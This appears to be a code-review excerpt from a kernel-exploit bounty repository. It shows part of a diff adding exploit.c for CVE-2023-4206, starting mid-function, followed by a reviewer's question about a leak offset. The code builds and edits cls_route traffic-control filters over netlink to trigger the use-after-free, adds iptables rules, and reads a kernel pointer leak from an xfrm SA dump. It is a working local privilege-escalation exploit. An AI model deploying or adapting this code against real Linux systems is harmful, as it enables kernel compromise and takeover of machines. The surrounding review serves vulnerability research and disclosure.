pocs/linux/kernelctf/CVE-2023-4206_lts_cos_mitigation_2/exploit/mitigation-6.1/exploit.c

```diff
@@ -0,0 +1,1010 @@
+
+
+	if (!iptc_append_entry("OUTPUT", e, h)) {
+		printf("iptc_append_entry::Error insert/append entry: %s\n", iptc_strerror(errno));
+		goto end;
+	}
+	if (!iptc_commit(h)) {
+                err(1, "commit: %s\n", iptc_strerror(errno));
+	}
+
+	end:
+		free(e);
+		iptc_free(h);
+}
+
+void add_route_filter(uint32_t parent, uint32_t chain, uint32_t handle, uint32_t target, int edit)
+{
+        struct tcmsg hdr;
+        struct nlmsg nlmsg;
+        int prio = 1;
+
+        int flags = 0;
+
+        if (!edit)
+                flags = NLM_F_CREATE | NLM_F_EXCL;
+
+        memset(&hdr, 0, sizeof(hdr));
+
+        hdr.tcm_family = AF_UNSPEC;
+        hdr.tcm_ifindex = 1;
+        hdr.tcm_parent = parent;
+
+// cls_route handles contain following parameters encoded in uint32_t: source realm, source interface and destination realm
+// This means we only filter by destination realm, any source will match:
+        hdr.tcm_handle = (handle & 0xff) | (0xffff << 16);
+
+        hdr.tcm_info = TC_H_MAKE(prio << 16, htons(ETH_P_ALL));
+
+        netlink_init(&nlmsg, RTM_NEWTFILTER, flags, &hdr, sizeof(hdr));
+
+        netlink_attr(&nlmsg, TCA_CHAIN, &chain, sizeof(chain));
+        char kind[] = "route";
+        netlink_attr(&nlmsg, TCA_KIND, &kind, sizeof(kind));
+
+        int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
+        if (sock == -1) {
+                perror("netlink sock");
+                exit(1);
+        }
+
+        netlink_nest(&nlmsg, TCA_OPTIONS);
+
+        uint32_t to = handle;
+
+// Editing an existing filter without changing match params throws -EEXIST
+        if (edit)
+                to = 0x10;
+
+        netlink_attr(&nlmsg, TCA_ROUTE4_TO, &to, sizeof(to));
+
+        if (target) {
+                uint32_t class_id = target;
+                netlink_attr(&nlmsg, TCA_ROUTE4_CLASSID, &class_id, sizeof(class_id));
+        }
+
+        netlink_done(&nlmsg);
+        int err = netlink_send(&nlmsg, sock);
+
+        close(sock);
+}
+
+uint64_t xfrm_get_sa(unsigned int id)
+{
+
+        static struct nl_sock *sock = NULL;
+
+        if (!sock) {
+                sock = nl_cli_alloc_socket();
+                nl_cli_connect(sock, NETLINK_XFRM);
+        }
+
+        struct nl_msg *msg = nlmsg_alloc_simple(XFRM_MSG_GETSA, NLM_F_DUMP);
+        
+        if (!msg)
+                err(1, "nlmsg_alloc_simple");
+
+        struct xfrm_address_filter filter;
+        memset ((void*)&filter, 0, sizeof (filter));
+
+        filter.family = AF_INET;
+        filter.saddr.a4 = id;
+        filter.splen = 32;
+
+        NLA_PUT (msg, XFRMA_ADDRESS_FILTER, sizeof (struct xfrm_address_filter), &filter);
+
+        int ret = nl_send_auto(sock, msg);
+        struct sockaddr_nl nla = {0};
+
+        unsigned char *data;
+        ret = nl_recv(sock, &nla, &data, NULL);
+
+        if (ret < 100)
+                err(1, "SA not found for: %d recv: %d", id, ret);
+
+        uint64_t leak = *(uint64_t *) (data+260);
```

Comment:
You mentioned that we are leaking from `kmalloc-96` in the writeup, but here we are leaking data from offset 260, I guess `data` here contains a lot of message headers. Where the leak starts? Are you leaking the `alg_name` field or the `alg_key` field?

Can you replace `+260` with something like `+252+SIMPLE_XATTR_OFFS_NAME` and define `SIMPLE_XATTR_OFFS_NAME` as `0x10`?